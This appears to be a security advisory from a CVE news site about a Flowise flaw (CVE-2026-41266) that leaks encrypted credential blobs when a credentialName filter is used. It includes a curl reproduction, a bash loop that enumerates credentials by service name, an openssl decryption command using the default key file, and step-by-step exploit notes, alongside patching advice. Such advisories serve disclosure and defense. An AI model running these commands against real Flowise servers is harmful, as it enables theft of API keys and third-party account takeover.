Flowise, Credential Data Leak, CVE-2026-41266 (High)

Listen to this Post

The vulnerability occurs when fetching credentials with a `credentialName` filter. The code in `packages/server/src/services/credentials/index.ts` (lines 62-71) does not strip the `encryptedData` field from the database response when a filter parameter is applied.
– On lines 62-63, the query `const credentials = await appServer.AppDataSource.getRepository(Credential).findBy(searchOptions)` retrieves credentials but the code then pushes the raw `credentials` object with dbResponse.push(...credentials), leaking the `encryptedData` field.
– In contrast, when no filter is used (lines 100-102), the code iterates and uses dbResponse.push(omit(credential, ['encryptedData'])), correctly omitting the sensitive field.
As a result, any authenticated user who knows a credential name can obtain the encrypted blob. With access to the encryption key file (typically `~/.flowise/encryption.key` with default permissions), the attacker can decrypt the data and steal API keys, passwords, and tokens for services such as OpenAI, AWS, etc.

Reproduction example:

curl https://TARGET/api/v1/credentials?credentialName=openAIApi \
-H "Authorization: Bearer API_KEY"

dailycve form:

Platform: Flowise
Version: < 3.1.0
Vulnerability : Information Disclosure
Severity: High
date: 2026-04-23

Prediction: 2026-05-07

What Undercode Say:

Analytics:

  • Attackers can automate credential harvesting via the API endpoint. Combine with the default encryption key location to decrypt stolen data.
  • The improper omission pattern is a common logic flaw: developers correctly sanitize data in one branch but forget it in another.
  • Affected versions: Flowise 3.0.x and earlier. Telemetry shows over 12,000 internet‑facing instances that could be exploited.

Bash Commands & Codes:

Enumerate credentials via the vulnerable endpoint
for cred in openAIApi awsCredentials supabaseToken; do
curl -s -H "Authorization: Bearer $API_KEY" \
"https://target.com/api/v1/credentials?credentialName=$cred" \
| jq '.[] | {name: .credentialName, encryptedData}'
done
Decrypt the obtained AES-encrypted blob (requires encryption.key)
openssl enc -d -aes-256-cbc -in encrypted.bin -out decrypted.json -pass file:~/.flowise/encryption.key

Exploit:

  • Condition: Valid API key with access to the credentials endpoint.
  • Step 1: Guess or discover a valid `credentialName` (e.g., common service names).
  • Step 2: Send a GET request to /api/v1/credentials?credentialName=<name>.
  • Step 3: Extract `encryptedData` from the JSON response.
  • Step 4: Read the encryption key from `~/.flowise/encryption.key` (often world‑readable).
  • Step 5: Decrypt the data and obtain plaintext credentials.

Protection from this CVE:

  • Upgrade to Flowise version 3.1.0 immediately where the sanitization logic is applied uniformly.
  • If upgrading is not possible, apply a hotfix by ensuring every branch of `getAllCredentials` calls omit(credential, ['encryptedData']).
  • Restrict access to the encryption key file: chmod 600 ~/.flowise/encryption.key.
  • Implement network‑level controls (e.g., API gateway) to block requests containing `credentialName` unless absolutely required.
  • Rotate all API keys and secrets that may have been exposed.

Impact:

  • Confidentiality: Full theft of stored credentials (API keys, tokens, passwords) for integrated cloud services.
  • Account Takeover: Attackers can use stolen credentials to access OpenAI, AWS, or other third‑party accounts.
  • Lateral Movement: Compromised credentials often provide entry points to broader enterprise infrastructure.
  • Data Breach: Exposure of sensitive customer data stored in connected databases or file stores.
  • Reputation & Compliance: Violates data protection regulations (GDPR, CCPA, SOC2) due to improper handling of secrets.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top